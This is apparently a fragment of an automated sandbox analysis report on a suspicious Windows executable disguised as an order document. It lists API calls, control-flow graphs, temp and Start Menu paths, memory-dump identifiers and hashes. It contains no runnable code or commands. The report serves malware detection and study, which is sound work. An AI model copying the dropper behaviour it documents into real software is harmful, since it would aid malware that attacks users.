                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: CloseEnum$DeleteValue
                                                  • String ID:
                                                  • API String ID: 1354259210-0
                                                  • Opcode ID: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                                  • Instruction ID: 6dce0a33df475c695949d28520f5422678f12aee2cc84e9e423a55bf09ef2c56
                                                  • Opcode Fuzzy Hash: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                                  • Instruction Fuzzy Hash: 3B215C7250010CBBDF129F90CE89EEF7B6DEB44344F100076FA15B11A0E7B48F54AAA8

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 976 6ca5176b-6ca517a7 call 6ca51b28 980 6ca518c4-6ca518c6 976->980 981 6ca517ad-6ca517b1 976->981 982 6ca517b3-6ca517b9 call 6ca5233f 981->982 983 6ca517ba-6ca517c7 call 6ca52381 981->983 982->983 988 6ca517f7-6ca517fe 983->988 989 6ca517c9-6ca517ce 983->989 990 6ca51800-6ca5181c call 6ca52568 call 6ca515e9 call 6ca512f6 GlobalFree 988->990 991 6ca5181e-6ca51822 988->991 992 6ca517d0-6ca517d1 989->992 993 6ca517e9-6ca517ec 989->993 1013 6ca51873-6ca51877 990->1013 997 6ca51824-6ca5186a call 6ca515fb call 6ca52568 991->997 998 6ca5186c-6ca51872 call 6ca52568 991->998 995 6ca517d3-6ca517d4 992->995 996 6ca517d9-6ca517da call 6ca52ac8 992->996 993->988 999 6ca517ee-6ca517ef call 6ca52d53 993->999 1001 6ca517d6-6ca517d7 995->1001 1002 6ca517e1-6ca517e7 call 6ca52742 995->1002 1009 6ca517df 996->1009 997->1013 998->1013 1012 6ca517f4 999->1012 1001->988 1001->996 1017 6ca517f6 1002->1017 1009->1012 1012->1017 1018 6ca518b4-6ca518bb 1013->1018 1019 6ca51879-6ca51887 call 6ca5252e 1013->1019 1017->988 1018->980 1024 6ca518bd-6ca518be GlobalFree 1018->1024 1026 6ca5189f-6ca518a6 1019->1026 1027 6ca51889-6ca5188c 1019->1027 1024->980 1026->1018 1029 6ca518a8-6ca518b3 call 6ca51572 1026->1029 1027->1026 1028 6ca5188e-6ca51896 1027->1028 1028->1026 1030 6ca51898-6ca51899 FreeLibrary 1028->1030 1029->1018 1030->1026
                                                  APIs
                                                    • Part of subcall function 6CA51B28: GlobalFree.KERNEL32(?), ref: 6CA51D99
                                                    • Part of subcall function 6CA51B28: GlobalFree.KERNEL32(?), ref: 6CA51D9E
                                                    • Part of subcall function 6CA51B28: GlobalFree.KERNEL32(?), ref: 6CA51DA3
                                                  • GlobalFree.KERNEL32(00000000), ref: 6CA51816
                                                  • FreeLibrary.KERNEL32(?), ref: 6CA51899
                                                  • GlobalFree.KERNEL32(00000000), ref: 6CA518BE
                                                    • Part of subcall function 6CA5233F: GlobalAlloc.KERNEL32(00000040,?), ref: 6CA52370
                                                    • Part of subcall function 6CA52742: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6CA517E7,00000000), ref: 6CA52812
                                                    • Part of subcall function 6CA515FB: wsprintfA.USER32 ref: 6CA51629
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802235072457.000000006CA51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA50000, based on PE: true
                                                  • Associated: 00000005.00000002.1802235017861.000000006CA50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802235118767.000000006CA54000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802235161633.000000006CA56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_6ca50000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                                  • String ID:
                                                  • API String ID: 3962662361-3916222277
                                                  • Opcode ID: d0768fdc8e244ab8798b9bce9a854bd426e45d452f4da22b46964c81127e5095
                                                  • Instruction ID: cc40074014b996968d4cab0dd14e35d3cf4e5674ba8e4e6228e3698f7da1dc1c
                                                  • Opcode Fuzzy Hash: d0768fdc8e244ab8798b9bce9a854bd426e45d452f4da22b46964c81127e5095
                                                  • Instruction Fuzzy Hash: 9341B3715003059ACB049F788988BF637E8BF01318FD8C574EA169AA86DB74D4EDCBA0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1033 4024a3-4024ca call 402c5e * 2 call 402cee 1039 4024cf-4024d4 1033->1039 1040 402aea-402af9 1039->1040 1041 4024da-4024e4 1039->1041 1043 4024f4-4024f7 1041->1043 1044 4024e6-4024f3 call 402c5e lstrlenA 1041->1044 1045 4024f9-40250d call 402c3c 1043->1045 1046 40250e-402511 1043->1046 1044->1043 1045->1046 1050 402522-402536 RegSetValueExA 1046->1050 1051 402513-40251d call 403168 1046->1051 1055 402538 1050->1055 1056 40253b-402618 RegCloseKey 1050->1056 1051->1050 1055->1056 1056->1040
                                                  APIs
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,00000023,00000011,00000002), ref: 004024EE
                                                  • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,00000000,00000011,00000002), ref: 0040252E
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,00000000,00000011,00000002), ref: 00402612
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: CloseValuelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp
                                                  • API String ID: 2655323295-4121408785
                                                  • Opcode ID: 01be07207417a34e2fd7276a7f8dd5bd622f6c843808a50c06c527054a50520e
                                                  • Instruction ID: bcff8488b3c7483af384f27edc247fb8d09a012b63b7e061f1957b9ca53072ec
                                                  • Opcode Fuzzy Hash: 01be07207417a34e2fd7276a7f8dd5bd622f6c843808a50c06c527054a50520e
                                                  • Instruction Fuzzy Hash: A5118172E04118BFEF10AFA59E49AAE7AB4EB44314F20443FF505F71D1C6B98D829A18

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1058 405e4f-405e59 1059 405e5a-405e85 GetTickCount GetTempFileNameA 1058->1059 1060 405e94-405e96 1059->1060 1061 405e87-405e89 1059->1061 1063 405e8e-405e91 1060->1063 1061->1059 1062 405e8b 1061->1062 1062->1063
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405E63
                                                  • GetTempFileNameA.KERNELBASE(0000000C,?,00000000,?,?,004033D6,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008), ref: 00405E7D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-3756726018
                                                  • Opcode ID: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                                  • Instruction ID: 3970c65dfeb72379d163dc795dbdbe3f0392b49dfad0d6f3c406a96719355742
                                                  • Opcode Fuzzy Hash: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                                  • Instruction Fuzzy Hash: A0F082363042046BDB109F56EC04B9B7B9CEF91750F10803BF9889B180D6B099558798
                                                  APIs
                                                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020F5
                                                    • Part of subcall function 004053D1: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                                    • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                                    • Part of subcall function 004053D1: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0), ref: 0040542D
                                                    • Part of subcall function 004053D1: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll), ref: 0040543F
                                                    • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                                    • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                                    • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402105
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00402115
                                                  • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040217F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2987980305-0
                                                  • Opcode ID: 056f6e09274932c5806e516a526782628814fdef0fe3ef9b51a109e535a48abd
                                                  • Instruction ID: 18bbb9f6491bb16bc869df63e9f5beea4603ad23440c914569cabcc4b16c920a
                                                  • Opcode Fuzzy Hash: 056f6e09274932c5806e516a526782628814fdef0fe3ef9b51a109e535a48abd
                                                  • Instruction Fuzzy Hash: ED21C931A00115BBCF20BF659F89B6F7570AB40358F20413BF611B61D1CABD49839A5E
                                                  APIs
                                                    • Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,0000000C,00405D24,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,763F3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe"), ref: 00405CC6
                                                    • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
                                                    • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF
                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401632
                                                    • Part of subcall function 00405897: CreateDirectoryA.KERNELBASE(00431400,?), ref: 004058D9
                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne,00000000,00000000,000000F0), ref: 00401661
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne, xrefs: 00401656
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne
                                                  • API String ID: 1892508949-171433923
                                                  • Opcode ID: 2c20d4c644fd78e3d1f4ce17685fc2594679ef97166e32e1fcd970dca5652f26
                                                  • Instruction ID: 0b6d2b43488905cbaa276f6c0cac56371e043703d2fe031d841b632f48d4a949
                                                  • Opcode Fuzzy Hash: 2c20d4c644fd78e3d1f4ce17685fc2594679ef97166e32e1fcd970dca5652f26
                                                  • Instruction Fuzzy Hash: 3911E331904240AFDF307F754D41A7F26B0DA56724B68497FF891B22E2C63D49439A6E
                                                  APIs
                                                  • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000000,?,?,00406432,80000002), ref: 004061BA
                                                  • RegCloseKey.KERNELBASE(?,?,00406432,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll), ref: 004061C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID: Call
                                                  • API String ID: 3356406503-1824292864
                                                  • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                  • Instruction ID: 11b83480b68dea0a629fd90b3ddfe96452127a043c469d5d543a73811e09722f
                                                  • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                  • Instruction Fuzzy Hash: 9A01D472500209ABCF22CF10CD05FDB3FA8EF54354F01403AF915A6191D774CA64CB94
                                                  APIs
                                                  • GlobalFree.KERNELBASE(006C0360), ref: 00401C1B
                                                  • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401C2D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree
                                                  • String ID: Call
                                                  • API String ID: 3394109436-1824292864
                                                  • Opcode ID: 0514f784d2a2b378cc714ce1c47b00427531ebb3eb621da23fd343847ac9c6fe
                                                  • Instruction ID: 9dc913a82bccb3a17233260e0918e107c000b9093c8e114c97909187c283bf28
                                                  • Opcode Fuzzy Hash: 0514f784d2a2b378cc714ce1c47b00427531ebb3eb621da23fd343847ac9c6fe
                                                  • Instruction Fuzzy Hash: 292181B2600105EBDB50BFA58E84E5E72E8EB44318711453BF902F32D1DBBCE8169B9D
                                                  APIs
                                                    • Part of subcall function 00406620: FindFirstFileA.KERNELBASE(763F3410,0042BCD8,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,00405D50,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,763F3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,763F3410,C:\Users\user\AppData\Local\Temp\), ref: 0040662B
                                                    • Part of subcall function 00406620: FindClose.KERNEL32(00000000), ref: 00406637
                                                  • lstrlenA.KERNEL32 ref: 00402358
                                                  • lstrlenA.KERNEL32(00000000), ref: 00402362
                                                  • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 0040238A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: FileFindlstrlen$CloseFirstOperation
                                                  • String ID:
                                                  • API String ID: 1486964399-0
                                                  • Opcode ID: 291976f7d3112056eb6b717bd47d13cf5f6b9c3e892707c150601705bf3dcc2a
                                                  • Instruction ID: 014db6f64816cec2a1970dfcbbf9fa03b0cf1b46d42cec59bb2956c4bbb3b767
                                                  • Opcode Fuzzy Hash: 291976f7d3112056eb6b717bd47d13cf5f6b9c3e892707c150601705bf3dcc2a
                                                  • Instruction Fuzzy Hash: 35117071E04209ABDB10EFF58A45A9EB7F8AF00314F10407BA501F72C2D6FDC5428B59
                                                  APIs
                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025E7
                                                  • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025FA
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,00000000,00000011,00000002), ref: 00402612
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Enum$CloseValue
                                                  • String ID:
                                                  • API String ID: 397863658-0
                                                  • Opcode ID: 4c7cffd82a1a6ff72a98075f8b8725b621981bbded826c54beb525449930f380
                                                  • Instruction ID: cba12c4e2b45f70554d055d57f05f50eb42167a32c5ceb359e12f1818167ad50
                                                  • Opcode Fuzzy Hash: 4c7cffd82a1a6ff72a98075f8b8725b621981bbded826c54beb525449930f380
                                                  • Instruction Fuzzy Hash: 4E01BC71604204AFEB218F54DE98ABF7AACEB40348F10443FF005A61C0DAB84A459A29
                                                  APIs
                                                  • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402573
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,00000000,00000011,00000002), ref: 00402612
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID:
                                                  • API String ID: 3356406503-0
                                                  • Opcode ID: dcdcdbe78ff3a909b69e1bc964059ef71c3d22f6032091b40b69186da43a403e
                                                  • Instruction ID: 97fa2cc47e124225833d1b044c3f4c0ff185fe65e0aec06a9837656ed07e9740
                                                  • Opcode Fuzzy Hash: dcdcdbe78ff3a909b69e1bc964059ef71c3d22f6032091b40b69186da43a403e
                                                  • Instruction Fuzzy Hash: 6511C171905205EFDF20CF60CA985AE7AB4EF01344F20883FE446B72C0D6B88A45DA1A
                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
